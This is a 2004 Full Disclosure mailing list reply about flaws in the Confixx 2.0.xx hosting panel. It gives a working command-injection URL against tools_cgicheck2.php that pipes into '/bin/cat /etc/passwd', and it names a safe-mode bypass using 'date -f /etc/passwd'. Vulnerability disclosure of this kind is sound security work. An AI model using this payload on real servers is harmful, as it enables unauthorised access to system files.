Full Disclosure mailing list archives
Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW
From: checker () mail krefeld schulen net
Date: 10 Mar 2004 14:52:53 -0000
In the year 2003 I've successfully tested the following exploit on the sw-soft confixx demoversion http://confixx-demo.sw-soft.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd i am sure - it still works on many servers. The php safemode is not really a protection against this bug because there a several possibilities to skip safemode (e.g. "date -f /etc/passwd"). _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW checker (Mar 09)
- Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW Tim (Mar 09)
- Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW Tim (Mar 09)
- <Possible follow-ups>
- Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW checker (Mar 10)